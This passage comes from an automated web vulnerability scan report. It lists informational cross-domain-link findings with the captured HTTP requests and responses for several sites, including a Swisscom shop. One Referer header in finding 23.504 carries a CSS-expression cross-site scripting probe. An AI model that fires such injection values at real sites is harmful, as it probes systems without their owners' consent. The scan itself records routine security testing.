<li class='facebook'><a class='ie6fix' href='http://facebook.com/pages/Smart-Company-Growth/189449914398890'>Facebook</a></li><li class='twitter'><a class='ie6fix' href='http://www.twitter.com/KarlWalinskas'>Twitter</a>
...[SNIP]...

23.497. http://smartcompanygrowth.com/wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smartcompanygrowth.com
Path:   /wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js?ver=3.3.12 HTTP/1.1
Host: smartcompanygrowth.com
Proxy-Connection: keep-alive
Referer: http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8e07c6393cbc0d486d7317d1e46a398

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:44:53 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 13 Apr 2011 14:33:14 GMT
ETag: "2d9453e-6002-4a0cdb055de80"
Accept-Ranges: bytes
Content-Length: 24578
Content-Type: application/javascript

/*
Copyright (c) Shareaholic Inc (www.shareaholic.com). All rights reserved.
*/
SHR4P={};if(typeof SHRSB_Globals=="undefined")window.SHRSB_Globals={};if(typeof SHRSB_Globals.perfoption=="undefined")
...[SNIP]...
<div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a>
...[SNIP]...

23.498. http://smartcompanygrowth.com/wp-content/themes/avisio-smartcompanygrowth/flashplayer/flowplayer-3.1.4.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smartcompanygrowth.com
Path:   /wp-content/themes/avisio-smartcompanygrowth/flashplayer/flowplayer-3.1.4.min.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wp-content/themes/avisio-smartcompanygrowth/flashplayer/flowplayer-3.1.4.min.js?ver=3.1.1 HTTP/1.1
Host: smartcompanygrowth.com
Proxy-Connection: keep-alive
Referer: http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8e07c6393cbc0d486d7317d1e46a398

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:44:59 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 04 Jan 2011 02:10:00 GMT
ETag: "2d9c026-3e58-498fbc4094e00"
Accept-Ranges: bytes
Content-Length: 15960
Content-Type: application/javascript

/*
* flowplayer.js 3.1.4. The Flowplayer API
*
* Copyright 2009 Flowplayer Oy
*
* This file is part of Flowplayer.
*
* Flowplayer is free software: you can redistribute it and/or modify
*
...[SNIP]...
<p>Download latest version from <a href='http://www.adobe.com/go/getflashplayer'>here</a>
...[SNIP]...

23.499. http://smartcompanygrowth.com/wp-content/themes/avisio-smartcompanygrowth/js/prettyPhoto/js/jquery.prettyPhoto.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smartcompanygrowth.com
Path:   /wp-content/themes/avisio-smartcompanygrowth/js/prettyPhoto/js/jquery.prettyPhoto.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wp-content/themes/avisio-smartcompanygrowth/js/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.1 HTTP/1.1
Host: smartcompanygrowth.com
Proxy-Connection: keep-alive
Referer: http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8e07c6393cbc0d486d7317d1e46a398

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:45:54 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 04 Jan 2011 02:13:34 GMT
ETag: "2d9c240-41d3-498fbd0caaf80"
Accept-Ranges: bytes
Content-Length: 16851
Content-Type: application/javascript

/* ------------------------------------------------------------------------
*    Class: prettyPhoto
*    Use: Lightbox clone for jQuery
*    Author: Stephane Caron (http://www.no-margin-for-errors.com)

...[SNIP]...
</object>',quicktime_markup:'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" height="{height}" width="{width}"><param name="src" value="{path}">
...[SNIP]...

23.500. http://static.ch9.ms/scripts/videoplayer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ch9.ms
Path:   /scripts/videoplayer.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /scripts/videoplayer.js?v=Ff4HKqorUMDjwiJF2XtkkfwyVQo1 HTTP/1.1
Host: static.ch9.ms
Proxy-Connection: keep-alive
Referer: http://channel9.msdn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Type: application/x-javascript
Accept-Ranges: bytes
ETag: "f89bdd25720cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 27704
Age: 205095
Date: Sun, 24 Apr 2011 16:00:03 GMT
Last-Modified: Thu, 21 Apr 2011 22:19:14 GMT
Expires: Mon, 02 May 2011 07:15:34 GMT
Connection: keep-alive

/**
* jQuery.ScrollTo - Easy element scrolling using jQuery.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
...[SNIP]...
<br /> <a href="http://www.beautyoftheweb.com/">IE9+</a>, <a href="http://www.google.com/chrome/intl/en/landing_chrome.html">Chrome 5+</a>, or <a href="http://www.apple.com/safari/">Safari 4+</a>
...[SNIP]...
<a class='getSilverlight' href='javascript:Silverlight.getSilverlight(\"4.0.50401.0\");'><img src='http://go.microsoft.com/fwlink/?LinkId=108181' alt='Install Microsoft Silverlight' /></a>
...[SNIP]...
<br /><a href="http://www.beautyoftheweb.com/">IE9+</a>, <a href="http://www.google.com/chrome/intl/en/landing_chrome.html">Chrome 5+</a>, or <a href="http://www.apple.com/safari/">Safari 4+</a>
...[SNIP]...

23.501. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:51:11 GMT
Set-Cookie: JSESSIONID=9C1CE7D6C83E6C0ED19CE872CAA1A725; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 76582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<![endif]-->
   
   
   <link rel="stylesheet" href="http://www.bluewin.ch/css/osn/header.css" type="text/css" />
<!--[if lte IE 8]>
...[SNIP]...
<!--search -->
<link rel="stylesheet" href="http://search.swisscom.ch/css/popup/nyroModal.css" type="text/css" media="screen" />
<!--[if ie 6]>
...[SNIP]...
<div id="ctl00_contentPlaceholderHeader_headerControl_ExternalHeaderContent" class="ContentExternalHeader">
<script src="http://www.bluewin.ch/js/osn/osn_header.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.swisscom.com/GHQ/content?lang=en&plang=en&plang=en&plang=en">Swisscom Group</a>
...[SNIP]...
<li><a href="http://gis2.begasoft.ch/gis/swisscomGIS.jsf?lang=en&plang=en&show=shops,hotspots,buildings,verkehr">Locations</a>
...[SNIP]...
<li><a href="http://www.swisscom.ch/res/hilfe/kontakt/index.htm?languageId=en">Contact</a></li>        <li><a href="http://www.swisscom.ch/res/hilfe/rechnungdata/oshop/index.htm?languageId=en">Help</a>
...[SNIP]...
<div class="FullBanner"><script src="http://de.swisscom.ch/js/swfobject.js" type="text/javascript">
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUti
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img

src="http://swisscomonlineshop.122.2O7.net/b/ss/swisscomonlineshop/1/H.19.4--NS/0"

height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
</script>
<script src="http://sc.swisscom.ch/js/osn/s_one_code.js" type="text/javascript" ></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://o.swisscom.ch/b/ss/swisscom-onedev/1/H.21--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

23.502. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductConfig/ProductConfig.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&id=1000299810 HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt=&id=1000299810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671316799-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/products%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:55:06 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 72396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
    Swisscom
...[SNIP]...
<![endif]-->
   
   
   <link rel="stylesheet" href="http://www.bluewin.ch/css/osn/header.css" type="text/css" />
<!--[if lte IE 8]>
...[SNIP]...
<!--search -->
<link rel="stylesheet" href="http://search.swisscom.ch/css/popup/nyroModal.css" type="text/css" media="screen" />
<!--[if ie 6]>
...[SNIP]...
<div id="ctl00_contentPlaceholderHeader_headerControl_ExternalHeaderContent" class="ContentExternalHeader">
<script src="http://www.bluewin.ch/js/osn/osn_header.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.swisscom.com/GHQ/content?lang=en&plang=en&plang=en&plang=en">Swisscom Group</a>
...[SNIP]...
<li><a href="http://gis2.begasoft.ch/gis/swisscomGIS.jsf?lang=en&plang=en&show=shops,hotspots,buildings,verkehr">Locations</a>
...[SNIP]...
<li><a href="http://www.swisscom.ch/res/hilfe/kontakt/index.htm?languageId=en">Contact</a></li>        <li><a href="http://www.swisscom.ch/res/hilfe/rechnungdata/oshop/index.htm?languageId=en">Help</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img

src="http://swisscomonlineshop.122.2O7.net/b/ss/swisscomonlineshop/1/H.19.4--NS/0"

height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
</script>
<script src="http://sc.swisscom.ch/js/osn/s_one_code.js" type="text/javascript" ></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://o.swisscom.ch/b/ss/swisscom-onedev/1/H.21--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

23.503. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/ProductDetail/ProductDetail.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /onlineshop/Pages/ProductDetail/ProductDetail.aspx?cat=OS_Festnetz(MasterProducts)&subcat=OS_Fax(MasterProducts)&drilldown=4&subsubcat=OS_Normalpapier_Fax(MasterProducts)&id=000000000000125092(MasterProducts)&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Fax&drilldown=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CP=null*; s_cc=true; CTQ=second; s_nr=1303671130460-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_fax/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:56:31 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 48310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Swisscom O
...[SNIP]...
<![endif]-->
   
   
   <link rel="stylesheet" href="http://www.bluewin.ch/css/osn/header.css" type="text/css" />
<!--[if lte IE 8]>
...[SNIP]...
<!--search -->
<link rel="stylesheet" href="http://search.swisscom.ch/css/popup/nyroModal.css" type="text/css" media="screen" />
<!--[if ie 6]>
...[SNIP]...
<div id="ctl00_contentPlaceholderHeader_headerControl_ExternalHeaderContent" class="ContentExternalHeader">
<script src="http://www.bluewin.ch/js/osn/osn_header.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.swisscom.com/GHQ/content?lang=en&plang=en&plang=en&plang=en">Swisscom Group</a>
...[SNIP]...
<li><a href="http://gis2.begasoft.ch/gis/swisscomGIS.jsf?lang=en&plang=en&show=shops,hotspots,buildings,verkehr">Locations</a>
...[SNIP]...
<li><a href="http://www.swisscom.ch/res/hilfe/kontakt/index.htm?languageId=en">Contact</a></li>        <li><a href="http://www.swisscom.ch/res/hilfe/rechnungdata/oshop/index.htm?languageId=en">Help</a>
...[SNIP]...
<br />

           Versuchen Sie es erneut via der Startseite des <a href="http://www.swisscom.com/onlineshop/">Swisscom Online Shops</a>
...[SNIP]...
<br />

           Passez une nouvelle fois par la page d'accueil du <a href="http://www.swisscom.com/onlineshop/">Swisscom Online Shop</a>
...[SNIP]...
<br />

           Provate di nuovo tramite la pagina iniziale dello <a href="http://www.swisscom.com/onlineshop/">Swisscom Online Shop</a>
...[SNIP]...
<br />

           Try again via the <a href="http://www.swisscom.com/onlineshop/">Swisscom Online Shop Startpage</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img

src="http://swisscomonlineshop.122.2O7.net/b/ss/swisscomonlineshop/1/H.19.4--NS/0"

height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
</script>
<script src="http://sc.swisscom.ch/js/osn/s_one_code.js" type="text/javascript" ></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://o.swisscom.ch/b/ss/swisscom-onedev/1/H.21--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

23.504. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Products/Products.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt= HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671308852-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:18:35 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 105054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
<![endif]-->
   
   
   <link rel="stylesheet" href="http://www.bluewin.ch/css/osn/header.css" type="text/css" />
<!--[if lte IE 8]>
...[SNIP]...
<!--search -->
<link rel="stylesheet" href="http://search.swisscom.ch/css/popup/nyroModal.css" type="text/css" media="screen" />
<!--[if ie 6]>
...[SNIP]...
</script>

<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=swisscom1" type="text/javascript"></script>
...[SNIP]...
<div id="ctl00_contentPlaceholderHeader_headerControl_ExternalHeaderContent" class="ContentExternalHeader">
<script src="http://www.bluewin.ch/js/osn/osn_header.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.swisscom.com/GHQ/content?lang=en&plang=en&plang=en&plang=en">Swisscom Group</a>
...[SNIP]...
<li><a href="http://gis2.begasoft.ch/gis/swisscomGIS.jsf?lang=en&plang=en&show=shops,hotspots,buildings,verkehr">Locations</a>
...[SNIP]...
<li><a href="http://www.swisscom.ch/res/hilfe/kontakt/index.htm?languageId=en">Contact</a></li>        <li><a href="http://www.swisscom.ch/res/hilfe/rechnungdata/oshop/index.htm?languageId=en">Help</a>
...[SNIP]...
<div class="FullBanner"><script src="http://de.swisscom.ch/js/swfobject.js" type="text/javascript">
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUti
...[SNIP]...
<div class="addthis_toolbox addthis_default_style">

<a href="http://www.addthis.com/bookmark.php?v=250&username=swisscom1" class="addthis_button_compact"></a>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style">

<a href="http://www.addthis.com/bookmark.php?v=250&username=swisscom1" class="addthis_button_compact"></a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img

src="http://swisscomonlineshop.122.2O7.net/b/ss/swisscomonlineshop/1/H.19.4--NS/0"

height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
</script>
<script src="http://sc.swisscom.ch/js/osn/s_one_code.js" type="text/javascript" ></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://o.swisscom.ch/b/ss/swisscom-onedev/1/H.21--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

23.505. http://www.actividentity.com/device_identification_for_user_authentication  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /device_identification_for_user_authentication

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /device_identification_for_user_authentication?gclid=CNnXlJP1tagCFQ5-5Qodm1pYEg HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t1.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.506. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3%3C%3Ct551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ%3C%3CS%3C%3C HTTP/1.1
Host: www.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:25:39 GMT
Location: http://www.emjcd.com/oi121iqzyI/qx1/FELJFNML/FNFFNKF/E/uFI81DHKLMMDFHEHFHIJNFLIGDEu/MKrtIEoIKsGGFFsEMFEIEEGHostssoFK?u=j8yt%3DwytPq%2Bytu39y9E%2B9xuv9%2B7u84A7su_47tu7y3wJK--IGHH-GK-IJ--IG-HG-GKSTH%26A71%3Dx9958%25JQ%25IV%25IVCCC.us438A2u7.u6AyvqD.s42%25IVs438A2u7%25IV1q3ty3w.ux921%25JV%25ILLu89q79%25JT%25IMs425q3Edq2u%25JTsz_u835J7<sz4!CM6D-9KNrsJH2<x995%3A%2F%2FCCC.06FEvz.s42%3AOG%2Fs1ys0-HPHHPMH-HGNLHPON<<W<<
Set-Cookie: LCLK=cjo!w6qx-t47bc31m; domain=.apmebf.com; path=/; expires=Fri, 22-Apr-2016 03:25:38 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:25:38 GMT
Content-Length: 985

<html>
<head><meta http-equiv="redirect" content="http://www.emjcd.com/oi121iqzyI/qx1/FELJFNML/FNFFNKF/E/uFI81DHKLMMDFHEHFHIJNFLIGDEu/MKrtIEoIKsGGFFsEMFEIEEGHostssoFK?u=j8yt%3DwytPq%2Bytu39y9E%2B9xuv9
...[SNIP]...
<body>The URL has moved <a href="http://www.emjcd.com/oi121iqzyI/qx1/FELJFNML/FNFFNKF/E/uFI81DHKLMMDFHEHFHIJNFLIGDEu/MKrtIEoIKsGGFFsEMFEIEEGHostssoFK?u=j8yt%3DwytPq%2Bytu39y9E%2B9xuv9%2B7u84A7su_47tu7y3wJK--IGHH-GK-IJ--IG-HG-GKSTH%26A71%3Dx9958%25JQ%25IV%25IVCCC.us438A2u7.u6AyvqD.s42%25IVs438A2u7%25IV1q3ty3w.ux921%25JV%25ILLu89q79%25JT%25IMs425q3Edq2u%25JTsz_u835J7&lt;sz4!CM6D-9KNrsJH2&lt;x995%3A%2F%2FCCC.06FEvz.s42%3AOG%2Fs1ys0-HPHHPMH-HGNLHPON&lt;&lt;W&lt;&lt;">here</a>
...[SNIP]...

23.507. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

Issue detail

